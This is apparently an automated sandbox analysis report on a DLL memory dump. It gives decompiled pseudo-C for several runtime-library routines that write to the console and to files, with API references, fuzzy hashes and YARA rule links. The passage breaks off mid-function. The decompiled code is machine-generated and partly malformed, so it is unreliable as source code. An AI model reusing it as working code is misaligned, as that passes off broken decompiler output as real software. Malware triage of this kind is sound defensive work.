                          0x6e4b27d2
                          0x6e4b27cc
                          0x6e4b27b9
                          0x6e4b2674
                          0x00000000

                          APIs
                          • WriteConsoleW.KERNEL32(?,?,00000000,?,00000000,?,?,?), ref: 6E4B27B1
                          • WriteConsoleW.KERNEL32(?,?,00000001,?,00000000,?,?,?), ref: 6E4B2803
                          • GetLastError.KERNEL32(?,?,?), ref: 6E4B280D
                          • GetLastError.KERNEL32(?,?,?), ref: 6E4B2875
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ConsoleErrorLastWrite
                          • String ID:
                          • API String ID: 4006445483-0
                          • Opcode ID: 429c8756214d315943e1831cf06a907e4f2c5fc667d3a019e793a2bdafc39ca6
                          • Instruction ID: bd2d762c8536fa2abfd256d1948bb97d71272b300d0a48206cc259b83c4930f5
                          • Opcode Fuzzy Hash: 429c8756214d315943e1831cf06a907e4f2c5fc667d3a019e793a2bdafc39ca6
                          • Instruction Fuzzy Hash: 38616931E187158BE7148EF5CC50F6A7796EFC5344F048A3BE89487384EE75D84286BA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4BCDDF, Relevance: 6.2, APIs: 4, Instructions: 168COMMON
                          Download Yara Rule
                          C-Code - Quality: 64%
                          			E6E4BCDDF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x6e4f7f40);
				E6E4BAC90(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E6E4BAE10(_t107, E6E4BCB9D(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E6E4BAE10(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x6e4fb184; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x6e4c8154();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E6E4BF563(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0x6e4f7f60);
									E6E4BAC90(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E6E4BCDDF(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E6E4BDADF(_t103, _t108[0x18], E6E4BCB9D( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E6E4BDAEF(_t103, _t108[0x18], E6E4BCB9D( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E6E4BCB9D();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}



















                          0x6e4bcddf
                          0x6e4bcde1
                          0x6e4bcde6
                          0x6e4bcdeb
                          0x6e4bcded
                          0x6e4bcdf0
                          0x6e4bcdf5
                          0x6e4bcf05
                          0x6e4bcf05
                          0x6e4bcf05
                          0x00000000
                          0x6e4bce04
                          0x6e4bce04
                          0x6e4bce09
                          0x6e4bce13
                          0x6e4bce15
                          0x6e4bce1a
                          0x6e4bce1f
                          0x6e4bce1f
                          0x6e4bce21
                          0x6e4bce24
                          0x6e4bce29
                          0x6e4bce4b
                          0x6e4bce4b
                          0x6e4bce4e
                          0x6e4bce51
                          0x6e4bce6f
                          0x6e4bce72
                          0x6e4bceb1
                          0x6e4bceb4
                          0x6e4bceb7
                          0x6e4bcedc
                          0x6e4bcede
                          0x00000000
                          0x6e4bcee0
                          0x6e4bcee0
                          0x6e4bcee2
                          0x00000000
                          0x6e4bcee4
                          0x6e4bcee4
                          0x6e4bcee9
                          0x6e4bceed
                          0x6e4bceed
                          0x6e4bceee
                          0x00000000
                          0x6e4bceee
                          0x6e4bcee2
                          0x6e4bceb9
                          0x6e4bceb9
                          0x6e4bcebb
                          0x00000000
                          0x6e4bcebd
                          0x6e4bcebd
                          0x6e4bcebf
                          0x00000000
                          0x6e4bcec1
                          0x6e4bced2
                          0x00000000
                          0x6e4bced7
                          0x6e4bcebf
                          0x6e4bcebb
                          0x6e4bce74
                          0x6e4bce74
                          0x6e4bce78
                          0x00000000
                          0x6e4bce7e
                          0x6e4bce7e
                          0x6e4bce80
                          0x00000000
                          0x6e4bce86
                          0x6e4bce8d
                          0x6e4bce95
                          0x6e4bce99
                          0x6e4bce9b
                          0x6e4bce9e
                          0x6e4bcea3
                          0x6e4bcea4
                          0x00000000
                          0x6e4bcea4
                          0x6e4bce9e
                          0x00000000
                          0x6e4bce99
                          0x6e4bce80
                          0x6e4bce78
                          0x6e4bce53
                          0x6e4bce53
                          0x00000000
                          0x6e4bce53
                          0x6e4bce30
                          0x6e4bce30
                          0x6e4bce35
                          0x6e4bce3a
                          0x00000000
                          0x6e4bce3c
                          0x6e4bce3e
                          0x6e4bce47
                          0x6e4bce56
                          0x6e4bce58
                          0x6e4bcf17
                          0x6e4bcf17
                          0x6e4bcf1c
                          0x6e4bcf1d
                          0x6e4bcf1f
                          0x6e4bcf24
                          0x6e4bcf29
                          0x6e4bcf2c
                          0x6e4bcf2f
                          0x6e4bcf32
                          0x6e4bcf3b
                          0x6e4bcf3b
                          0x6e4bcf34
                          0x6e4bcf34
                          0x6e4bcf34
                          0x6e4bcf3e
                          0x6e4bcf42
                          0x6e4bcf45
                          0x6e4bcf46
                          0x6e4bcf47
                          0x6e4bcf48
                          0x6e4bcf4b
                          0x6e4bcf54
                          0x6e4bcf54
                          0x6e4bcf57
                          0x6e4bcf8d
                          0x6e4bcf59
                          0x6e4bcf59
                          0x6e4bcf59
                          0x6e4bcf5c
                          0x6e4bcf73
                          0x6e4bcf73
                          0x6e4bcf5c
                          0x6e4bcf92
                          0x6e4bcf9c
                          0x6e4bcfa8
                          0x6e4bce66
                          0x6e4bce66
                          0x6e4bce6b
                          0x6e4bce6c
                          0x6e4bcea6
                          0x6e4bcead
                          0x6e4bcef1
                          0x6e4bcef1
                          0x6e4bcef8
                          0x6e4bcf07
                          0x6e4bcf0a
                          0x6e4bcf16
                          0x6e4bcf16
                          0x6e4bce58
                          0x6e4bce3a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4bce09

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AdjustPointer
                          • String ID:
                          • API String ID: 1740715915-0
                          • Opcode ID: a3d87156fa383a805537f78ee94d46b5bee074590eaced153a3fbed1689cb134
                          • Instruction ID: e0edc4298e2f4973003fbeaea456b421c63353908752db41bff29437b64590cb
                          • Opcode Fuzzy Hash: a3d87156fa383a805537f78ee94d46b5bee074590eaced153a3fbed1689cb134
                          • Instruction Fuzzy Hash: F151C972605606EFEB158FB5D8D0FAA73A8EF04704F11086FE9159E290E771E861CBB0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4C06C7, Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6E4C06C7(intOrPtr* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t20;
				intOrPtr _t30;
				char _t32;
				intOrPtr _t40;
				intOrPtr* _t42;
				intOrPtr _t43;

				_t42 = _a4;
				if(_t42 != 0) {
					_t32 = 0;
					__eflags =  *_t42;
					if( *_t42 != 0) {
						_t17 = E6E4C19B3(_a16, 0, _t42, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t17;
						if(_t17 != 0) {
							_t40 = _a8;
							__eflags = _t17 -  *((intOrPtr*)(_t40 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t18 = E6E4C0D08(_a16, _t42,  *((intOrPtr*)(_t40 + 8)),  *((intOrPtr*)(_t40 + 0xc)));
								__eflags = _t18;
								if(_t18 != 0) {
									 *((intOrPtr*)(_t40 + 0x10)) = _t18 - 1;
									_t20 = 0;
									__eflags = 0;
								} else {
									E6E4BF8B5(GetLastError());
									_t20 =  *((intOrPtr*)(E6E4BF90F()));
								}
								L14:
								return _t20;
							}
							_t20 = E6E4C0D85(_t40, __eflags, _t17);
							__eflags = _t20;
							if(_t20 != 0) {
								goto L14;
							}
							goto L11;
						}
						E6E4BF8B5(GetLastError());
						return  *((intOrPtr*)(E6E4BF90F()));
					}
					_t43 = _a8;
					__eflags =  *((intOrPtr*)(_t43 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t43 + 8)))) = _t32;
						L2:
						 *((intOrPtr*)(_t43 + 0x10)) = _t32;
						return 0;
					}
					_t30 = E6E4C0D85(_t43, __eflags, 1);
					__eflags = _t30;
					if(_t30 != 0) {
						return _t30;
					}
					goto L6;
				}
				_t43 = _a8;
				E6E4C0D6B(_t43);
				_t32 = 0;
				 *((intOrPtr*)(_t43 + 8)) = 0;
				 *((intOrPtr*)(_t43 + 0xc)) = 0;
				goto L2;
			}











                          0x6e4c06ce
                          0x6e4c06d3
                          0x6e4c06f1
                          0x6e4c06f3
                          0x6e4c06f6
                          0x6e4c071f
                          0x6e4c0727
                          0x6e4c0729
                          0x6e4c0742
                          0x6e4c0745
                          0x6e4c0748
                          0x6e4c0756
                          0x6e4c0763
                          0x6e4c0768
                          0x6e4c076a
                          0x6e4c0783
                          0x6e4c0786
                          0x6e4c0786
                          0x6e4c076c
                          0x6e4c0773
                          0x6e4c077e
                          0x6e4c077e
                          0x6e4c0788
                          0x00000000
                          0x6e4c0788
                          0x6e4c074d
                          0x6e4c0752
                          0x6e4c0754
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4c0754
                          0x6e4c0732
                          0x00000000
                          0x6e4c073d
                          0x6e4c06f8
                          0x6e4c06fb
                          0x6e4c06fe
                          0x6e4c070d
                          0x6e4c0710
                          0x6e4c06e7
                          0x6e4c06e7
                          0x00000000
                          0x6e4c06ea
                          0x6e4c0704
                          0x6e4c0709
                          0x6e4c070b
                          0x6e4c078c
                          0x6e4c078c
                          0x00000000
                          0x6e4c070b
                          0x6e4c06d5
                          0x6e4c06da
                          0x6e4c06df
                          0x6e4c06e1
                          0x6e4c06e4
                          0x00000000

                          APIs
                            • Part of subcall function 6E4C19B3: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6E4C3B22,?,00000000,-00000008), ref: 6E4C1A5F
                          • GetLastError.KERNEL32 ref: 6E4C072B
                          • __dosmaperr.LIBCMT ref: 6E4C0732
                          • GetLastError.KERNEL32(?,?,?,?), ref: 6E4C076C
                          • __dosmaperr.LIBCMT ref: 6E4C0773
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                          • String ID:
                          • API String ID: 1913693674-0
                          • Opcode ID: 7337af9dce9203ad513df6f125a0b9e972b213b9c6b7b543c96de4c7c89fa7eb
                          • Instruction ID: 29594d4a22a5ad3b81cc905e2d424626fc00ced7079ec7568a9ff14fddd7fdff
                          • Opcode Fuzzy Hash: 7337af9dce9203ad513df6f125a0b9e972b213b9c6b7b543c96de4c7c89fa7eb
                          • Instruction Fuzzy Hash: 5C21FBB9605205AF97549FF58880C5B77BDFF40B687004A1FE81897200E730EC808FE2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4C57E6, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6E4C57E6(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x6e4facf0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E6E4C57CF();
					E6E4C5791();
					_t13 = WriteConsoleW( *0x6e4facf0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}




                          0x6e4c5803
                          0x6e4c5807
                          0x6e4c5814
                          0x6e4c5819
                          0x6e4c5834
                          0x6e4c5834
                          0x6e4c583a

                          APIs
                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6E4C5197,?,00000001,?,?,?,6E4C4486,?,?,00000000), ref: 6E4C57FD
                          • GetLastError.KERNEL32(?,6E4C5197,?,00000001,?,?,?,6E4C4486,?,?,00000000,?,?,?,6E4C4A0D,?), ref: 6E4C5809
                            • Part of subcall function 6E4C57CF: CloseHandle.KERNEL32(FFFFFFFE,6E4C5819,?,6E4C5197,?,00000001,?,?,?,6E4C4486,?,?,00000000,?,?), ref: 6E4C57DF
                          • ___initconout.LIBCMT ref: 6E4C5819
                            • Part of subcall function 6E4C5791: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6E4C57C0,6E4C5184,?,?,6E4C4486,?,?,00000000,?), ref: 6E4C57A4
                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6E4C5197,?,00000001,?,?,?,6E4C4486,?,?,00000000,?), ref: 6E4C582E
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                          • String ID:
                          • API String ID: 2744216297-0
                          • Opcode ID: 5e36b670ebe574879354effe2b33b5d6773c722ec8a949505640e23d7eb341d4
                          • Instruction ID: ff71aa1ef926fe0742ec373126a775cb32cbc8b71335f3ac26eee68d08341d02
                          • Opcode Fuzzy Hash: 5e36b670ebe574879354effe2b33b5d6773c722ec8a949505640e23d7eb341d4
                          • Instruction Fuzzy Hash: F9F0FE36400555FBCF522FE6AC08D8D3F25FF4AAA0F024011FE1996114D6319860DBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4C493F, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191fileCOMMON
                          Download Yara Rule
                          C-Code - Quality: 93%
                          			E6E4C493F(signed int _a4, void* _a8, signed int _a12, intOrPtr _a16) {
				void* _v5;
				void* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				long _v44;
				char _v48;
				intOrPtr _v52;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t78;
				intOrPtr _t82;
				char _t83;
				signed char _t85;
				signed int _t87;
				signed int _t90;
				signed int _t92;
				signed int _t95;
				signed int _t96;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				intOrPtr _t113;
				signed int _t114;
				intOrPtr _t117;
				signed int _t119;
				struct _OVERLAPPED* _t120;
				signed int _t123;
				signed int _t124;
				signed int _t127;
				struct _OVERLAPPED* _t129;
				void* _t132;

				_t114 = _a12;
				_t78 = _a8;
				_v12 = _t78;
				_v16 = _t114;
				_t113 = _a16;
				_t124 = _a4;
				if(_t114 == 0) {
					L36:
					__eflags = 0;
					return 0;
				}
				if(_t78 != 0) {
					_t127 = _t124 >> 6;
					_t123 = (_t124 & 0x0000003f) * 0x38;
					_v20 = _t127;
					_t82 =  *((intOrPtr*)(0x6e4fb5e0 + _t127 * 4));
					_v52 = _t82;
					_v24 = _t123;
					_t83 =  *((intOrPtr*)(_t123 + _t82 + 0x29));
					_v5 = _t83;
					__eflags = _t83 - 2;
					if(_t83 == 2) {
						L6:
						_t85 =  !_t114;
						__eflags = _t85 & 0x00000001;
						if((_t85 & 0x00000001) == 0) {
							goto L2;
						}
						L7:
						_t129 = 0;
						__eflags =  *(_t123 + _v52 + 0x28) & 0x00000020;
						if(__eflags != 0) {
							E6E4C515B(_t124, 0, 0, 2, _t113);
							_t132 = _t132 + 0x14;
						}
						_t90 = E6E4C44C3(_t114, _t123, __eflags, _t124, _t113);
						__eflags = _t90;
						if(_t90 == 0) {
							_t117 =  *((intOrPtr*)(0x6e4fb5e0 + _v20 * 4));
							_t92 = _v24;
							__eflags =  *((char*)(_t92 + _t117 + 0x28));
							if( *((char*)(_t92 + _t117 + 0x28)) >= 0) {
								asm("stosd");
								asm("stosd");
								asm("stosd");
								_t95 = WriteFile( *(_t92 + _t117 + 0x18), _v12, _v16,  &_v44, _t129);
								__eflags = _t95;
								if(_t95 == 0) {
									_v48 = GetLastError();
								}
								goto L26;
							}
							_t101 = _v5 - _t129;
							__eflags = _t101;
							if(_t101 == 0) {
								E6E4C4541( &_v48, _t124, _v12, _v16);
								L20:
								goto L13;
							}
							_t104 = _t101 - 1;
							__eflags = _t104;
							if(_t104 == 0) {
								_t103 = E6E4C4705( &_v48, _t124, _v12, _v16);
								goto L20;
							}
							__eflags = _t104 != 1;
							if(_t104 != 1) {
								goto L32;
							}
							_t103 = E6E4C461C( &_v48, _t124, _v12, _v16);
							goto L20;
						} else {
							_t108 = _v5;
							__eflags = _t108;
							if(_t108 == 0) {
								_t103 = E6E4C4089( &_v48, _t124, _v12, _v16, _t113);
								L13:
								L26:
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t96 = _v32;
								__eflags = _t96;
								if(_t96 != 0) {
									_t77 =  &_v28; // 0x6e4c27ee
									return _t96 -  *_t77;
								}
								_t87 = _v36;
								__eflags = _t87;
								if(_t87 == 0) {
									_t129 = 0;
									__eflags = 0;
									L32:
									_t119 = _v24;
									_t87 =  *(0x6e4fb5e0 + _v20 * 4);
									__eflags =  *(_t119 + _t87 + 0x28) & 0x00000040;
									if(( *(_t119 + _t87 + 0x28) & 0x00000040) == 0) {
										L34:
										 *((char*)(_t113 + 0x1c)) = 1;
										 *((intOrPtr*)(_t113 + 0x18)) = 0x1c;
										 *((char*)(_t113 + 0x24)) = 1;
										 *(_t113 + 0x20) = _t129;
										L3:
										return _t87 | 0xffffffff;
									}
									_t87 = _v12;
									__eflags =  *_t87 - 0x1a;
									if( *_t87 == 0x1a) {
										goto L36;
									}
									goto L34;
								}
								_t120 = 5;
								__eflags = _t87 - _t120;
								if(_t87 != _t120) {
									_t87 = E6E4BF8D8(_t87, _t113);
								} else {
									 *((char*)(_t113 + 0x1c)) = 1;
									 *((intOrPtr*)(_t113 + 0x18)) = 9;
									 *((char*)(_t113 + 0x24)) = 1;
									 *(_t113 + 0x20) = _t120;
								}
								goto L3;
							}
							__eflags = _t108 - 1 - 1;
							if(_t108 - 1 > 1) {
								goto L32;
							}
							E6E4C445B( &_v48, _v12, _v16);
							goto L13;
						}
					}
					__eflags = _t83 - 1;
					if(_t83 != 1) {
						goto L7;
					}
					goto L6;
				}
				L2:
				 *((char*)(_t113 + 0x24)) = 1;
				 *(_t113 + 0x20) = 0;
				 *((char*)(_t113 + 0x1c)) = 1;
				 *((intOrPtr*)(_t113 + 0x18)) = 0x16;
				_t87 = E6E4C04A5(_t124, _t127, 0, 0, 0, 0, 0, _t113);
				goto L3;
			}







































                          0x6e4c4947
                          0x6e4c494a
                          0x6e4c494d
                          0x6e4c4950
                          0x6e4c4954
                          0x6e4c4959
                          0x6e4c495e
                          0x6e4c4b38
                          0x6e4c4b38
                          0x00000000
                          0x6e4c4b38
                          0x6e4c4966
                          0x6e4c4999
                          0x6e4c499c
                          0x6e4c499f
                          0x6e4c49a2
                          0x6e4c49a9
                          0x6e4c49ac
                          0x6e4c49af
                          0x6e4c49b3
                          0x6e4c49b6
                          0x6e4c49b8
                          0x6e4c49be
                          0x6e4c49c0
                          0x6e4c49c2
                          0x6e4c49c4
                          0x00000000
                          0x00000000
                          0x6e4c49c6
                          0x6e4c49c9
                          0x6e4c49cb
                          0x6e4c49d0
                          0x6e4c49d8
                          0x6e4c49dd
                          0x6e4c49dd
                          0x6e4c49e2
                          0x6e4c49e9
                          0x6e4c49eb
                          0x6e4c4a30
                          0x6e4c4a37
                          0x6e4c4a3a
                          0x6e4c4a3f
                          0x6e4c4a99
                          0x6e4c4a9b
                          0x6e4c4a9c
                          0x6e4c4aa8
                          0x6e4c4aae
                          0x6e4c4ab0
                          0x6e4c4ab8
                          0x6e4c4ab8
                          0x00000000
                          0x6e4c4abb
                          0x6e4c4a45
                          0x6e4c4a45
                          0x6e4c4a47
                          0x6e4c4a89
                          0x6e4c4a67
                          0x00000000
                          0x6e4c4a67
                          0x6e4c4a49
                          0x6e4c4a49
                          0x6e4c4a4c
                          0x6e4c4a77
                          0x00000000
                          0x6e4c4a77
                          0x6e4c4a4e
                          0x6e4c4a51
                          0x00000000
                          0x00000000
                          0x6e4c4a62
                          0x00000000
                          0x6e4c49ed
                          0x6e4c49ed
                          0x6e4c49f0
                          0x6e4c49f2
                          0x6e4c4a23
                          0x6e4c4a10
                          0x6e4c4abe
                          0x6e4c4ac1
                          0x6e4c4ac2
                          0x6e4c4ac3
                          0x6e4c4ac4
                          0x6e4c4ac7
                          0x6e4c4ac9
                          0x6e4c4b33
                          0x00000000
                          0x6e4c4b33
                          0x6e4c4acb
                          0x6e4c4ace
                          0x6e4c4ad0
                          0x6e4c4afe
                          0x6e4c4afe
                          0x6e4c4b00
                          0x6e4c4b03
                          0x6e4c4b06
                          0x6e4c4b0d
                          0x6e4c4b12
                          0x6e4c4b1c
                          0x6e4c4b1c
                          0x6e4c4b20
                          0x6e4c4b27
                          0x6e4c4b2b
                          0x6e4c498a
                          0x00000000
                          0x6e4c498a
                          0x6e4c4b14
                          0x6e4c4b17
                          0x6e4c4b1a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4c4b1a
                          0x6e4c4ad4
                          0x6e4c4ad5
                          0x6e4c4ad7
                          0x6e4c4af2
                          0x6e4c4ad9
                          0x6e4c4ad9
                          0x6e4c4add
                          0x6e4c4ae4
                          0x6e4c4ae8
                          0x6e4c4ae8
                          0x00000000
                          0x6e4c4ad7
                          0x6e4c49f6
                          0x6e4c49f8
                          0x00000000
                          0x00000000
                          0x6e4c4a08
                          0x00000000
                          0x6e4c4a0d
                          0x6e4c49eb
                          0x6e4c49ba
                          0x6e4c49bc
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4c49bc
                          0x6e4c4968
                          0x6e4c496a
                          0x6e4c4972
                          0x6e4c4976
                          0x6e4c497b
                          0x6e4c4982
                          0x00000000

                          APIs
                            • Part of subcall function 6E4C4089: GetConsoleOutputCP.KERNEL32(F06451CF,?,00000000,?), ref: 6E4C40EC
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,?,?,6E4C27EE,?), ref: 6E4C4AA8
                          • GetLastError.KERNEL32(?,6E4C27EE,?,}&Ln,00000000,?,00000000,6E4C267D,?,00000000,00000000,6E4F8248,0000002C,6E4C26EE,?), ref: 6E4C4AB2
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ConsoleErrorFileLastOutputWrite
                          • String ID: 'Ln
                          • API String ID: 2915228174-3768261957
                          • Opcode ID: c1d2f186103ea6e060b63086251ad1bbf784ec98e30d2aa44dba6b47eed15d09
                          • Instruction ID: ee534ab9d2223ab9a73f1309e3557b9817a68b6f7023819e9ed6999d66949e5f
                          • Opcode Fuzzy Hash: c1d2f186103ea6e060b63086251ad1bbf784ec98e30d2aa44dba6b47eed15d09
                          • Instruction Fuzzy Hash: 4A61A379D04159AEDF01CFF98944EDEBBB9AF0AB58F00404AE814A7241D372D906CB66
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4BD3E0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON
                          Download Yara Rule
                          C-Code - Quality: 58%
                          			E6E4BD3E0(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
